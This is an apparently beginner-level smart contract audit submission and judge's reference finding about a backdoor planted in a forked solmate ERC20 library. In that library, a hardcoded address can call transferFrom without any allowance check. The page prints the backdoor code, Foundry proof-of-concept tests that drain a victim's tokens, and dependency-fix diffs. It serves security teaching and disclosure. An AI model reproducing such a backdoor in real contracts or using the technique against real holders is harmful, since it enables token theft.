Santa's List
AI First Flight #3
Beginner FriendlyFoundry
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

F-3: Supply Chain Backdoor in `solmate-bad` ERC20 Dependency

diegotrigueros

Root + Impact

Description

  • The project's foundry.toml remaps @solmate to lib/solmate-bad, a
    malicious fork of the solmate library hosted at
    github.com/patrickalphac/solmate-bad.

  • SantaToken.sol imports its ERC20 base from this backdoored library at
    line 4: import {ERC20} from "@solmate/src/tokens/ERC20.sol";

  • The fork inserts a backdoor in the transferFrom() function: the hardcoded
    address 0x815F577F1c1bcE213c012f166744937C889DAF17 can transfer tokens
    from ANY address to ANY address, bypassing all allowance checks. The rest of
    the file is byte-for-byte identical to legitimate solmate, making detection
    difficult without explicit diffing.

  • This address matches the "South Pole Elves" address in the SantasList
    contract comment at line 55.

// lib/solmate-bad/src/tokens/ERC20.sol — inside transferFrom()
// hehehe :)
if (msg.sender == 0x815F577F1c1bcE213c012f166744937C889DAF17) {
// @> Bypasses ALL allowance checks — god-mode transfer for this address
balanceOf[from] -= amount;
unchecked {
balanceOf[to] += amount;
}
emit Transfer(from, to, amount);
return true;
}
// ... normal allowance logic follows but is never reached for this address

Risk

Likelihood:

  • The backdoor is active and requires no setup. A single transferFrom call
    from the attacker address drains any victim's entire SantaToken balance.

  • The rest of the ERC20 implementation is identical to legitimate solmate,
    making the backdoor very hard to spot in casual review — a textbook supply
    chain attack.

Impact:

  • Complete theft of all SantaTokens from all holders.

  • Every EXTRA_NICE user who collects presents has their tokens immediately
    at risk of theft.

  • Undermines all trust in the token contract.

Proof of Concept

  • The attacker address 0x815F...AF17 calls transferFrom(victim, attacker, victimBalance) on the SantaToken contract. Because the backdoor check in
    solmate-bad's transferFrom fires before any allowance verification, the
    transfer succeeds without any prior approval. The victim's entire token
    balance is moved to the attacker in a single transaction.

function test_F3_backdoorStealsTokens() public {
address attacker = 0x815F577F1c1bcE213c012f166744937C889DAF17;
address victim = makeAddr("victim");
// Setup: victim has 1e18 SantaTokens (collected as EXTRA_NICE)
uint256 victimBal = santaToken.balanceOf(victim);
assertGt(victimBal, 0);
// Attacker steals ALL tokens — no allowance needed
vm.prank(attacker);
santaToken.transferFrom(victim, attacker, victimBal);
assertEq(santaToken.balanceOf(victim), 0);
assertEq(santaToken.balanceOf(attacker), victimBal);
}

Recommended Mitigation

  • Replace the malicious solmate-bad dependency with the legitimate solmate
    library maintained by transmissions11. This removes the backdoor entirely
    since the real solmate's transferFrom enforces standard allowance checks.

# foundry.toml
- '@solmate=lib/solmate-bad',
+ '@solmate=lib/solmate',
# .gitmodules
[submodule "lib/solmate-bad"]
- url = https://github.com/patrickalphac/solmate-bad
+ url = https://github.com/transmissions11/solmate
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-05] Malicious Code Injection in solmate ERC20 Contract inside `transferFrom` function which is inherited in `SantaToken`

## Description A malicious code is detected in a modified version of the Solmate ERC20 contract inside the `transferFrom` function. The library was forked from the Solmate repository and has been modified to include the malicious code. The `SantaToken` contract inherits this malicious ERC20 contract which brings all the risks inside the SantaToken contract that are associated with the modified ERC20 contract. The code is modified in such a way to allow a specific address to transfer tokens without checking for allowances and thus it causes token transfers without the permission of the users. ## Vulnerability Details Instead of using the official [Solmate's](https://github.com/transmissions11/solmate) ERC20 contract a [forked Solmate](https://github.com/patrickalphac/solmate-bad/tree/c3877e5571461c61293503f45fc00959fff4ebba) library was used which contains the modified ERC20 contract. The vulnerability arises due to the usage of unofficial solmate repo which was forked from official solmate containing a commit involving the malicious code injected inside the `transferFrom` function of the Solmate's ERC20 contract. The malicious code added to the `transferFrom` function allows a specific Ethereum address `0x815F577F1c1bcE213c012f166744937C889DAF17` to transfer tokens from any other address to a target address. This is done without checking the approval status of the `from` address. This could lead to unauthorized token transfers, potentially draining accounts without the account owner's consent. The address `0x815F577F1c1bcE213c012f166744937C889DAF17` is the same address of the `South Pole Elves` mentioned in the `@author` field for the Smart Contracts [here](https://github.com/Cyfrin/2023-11-Santas-List/blob/main/src/SantasList.sol#L55). The malicious code starts from the line 87 to line 96 inside the `transferFrom` in the modified Solmate's ERC20 contract. ```cpp function transferFrom(address from, address to, uint256 amount) public virtual returns (bool) { @> // hehehe :) @> // https://arbiscan.io/tx/0xd0c8688c3bcabd0024c7a52dfd818f8eb656e9e8763d0177237d5beb70a0768d @> if (msg.sender == 0x815F577F1c1bcE213c012f166744937C889DAF17) { @> balanceOf[from] -= amount; @> unchecked { @> balanceOf[to] += amount; @> } @> emit Transfer(from, to, amount); @> return true; @> } uint256 allowed = allowance[from][msg.sender]; // Saves gas for limited approvals. if (allowed != type(uint256).max) allowance[from][msg.sender] = allowed - amount; balanceOf[from] -= amount; // Cannot overflow because the sum of all user // balances can't exceed the max uint256 value. unchecked { balanceOf[to] += amount; } emit Transfer(from, to, amount); return true; } ``` ## Impact This vulnerability allows the attacker (with the ethereum adress - `0x815F577F1c1bcE213c012f166744937C889DAF17`) to arbitrarily transfer tokens from any address to any other address without requiring approval from the `from` address to attacker's address. This can lead to significant financial loss for token holders and can undermine the trust in the SantaToken. Since the malicious code is present in ERC20 contract which is inherited in `SantaToken` which will allow the attacker to arbitrarily transfer SantaToken from any address to any other address and use the stolen SantaToken to buy present. Furthermore, if there are any other services which can be availed with SantaToken, then attacker can benefit from all of them. ## PoC Add the test in the file: `test/unit/SantasListTest.t.sol`. Run the test: ```cpp forge test --mt test_ElvesCanTransferTokenWithoutApprovals ``` ```cpp function test_ElvesCanTransferTokenWithoutApprovals() public { // address of the south pole elves address southPoleElves = 0x815F577F1c1bcE213c012f166744937C889DAF17; vm.startPrank(santa); // Santa checks user once as EXTRA_NICE santasList.checkList(user, SantasList.Status.EXTRA_NICE); // Santa checks user second time santasList.checkTwice(user, SantasList.Status.EXTRA_NICE); vm.stopPrank(); // christmas time 🌳🎁 HO-HO-HO vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME()); // User collects their NFT and tokens for being EXTRA_NICE vm.prank(user); santasList.collectPresent(); // Now the user have some SantaTokens uint256 userBalance = santaToken.balanceOf(user); assertEq(userBalance, 1e18); // user needs to give approval to others in order to move tokens to other addresses via 'transferFrom' // but the south pole elves can move tokens of anyone without approval permissions vm.prank(southPoleElves); bool success = santaToken.transferFrom(user, southPoleElves, userBalance); assert(success == true); assertEq(santaToken.balanceOf(user), 0); assertEq(santaToken.balanceOf(southPoleElves), userBalance); } ``` ## Recommendations - Santa should first identify the specific elves who were responsible for the malicious code and start their counselling as soon as possible and teach them a nice lesson so that they don't write smart contracts with malicious intent and should also motivate them to apply to Cyfrin Updraft. - Use the ERC20 contract from the official Solmate's library. Always verify the code before it is used in the SmartContract and always use code from official source. - Delete the malicious forked solmate library from the `lib` folder. - Refactor the library installs in every place. - `Makefile (Line - 13)` ```diff - install :; forge install foundry-rs/forge-std --no-commit && forge install openzeppelin/openzeppelin-contracts --no-commit && forge install patrickalphac/solmate-bad --no-commit + install :; forge install foundry-rs/forge-std --no-commit && forge install openzeppelin/openzeppelin-contracts --no-commit && forge install transmissions11/solmate --no-commit ``` - `foundry.toml` ```diff remappings = [ '@openzeppelin/contracts=lib/openzeppelin-contracts/contracts', - '@solmate=lib/solmate-bad', + '@solmate=lib/solmate', ] ``` - `.gitmodules` ```diff [submodule "lib/forge-std"] path = lib/forge-std url = https://github.com/foundry-rs/forge-std [submodule "lib/openzeppelin-contracts"] path = lib/openzeppelin-contracts url = https://github.com/openzeppelin/openzeppelin-contracts -[submodule "lib/solmate-bad"] - path = lib/solmate-bad - url = https://github.com/patrickalphac/solmate-bad +[submodule "lib/solmate"] + path = lib/solmate + url = https://github.com/transmissions11/solmate ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!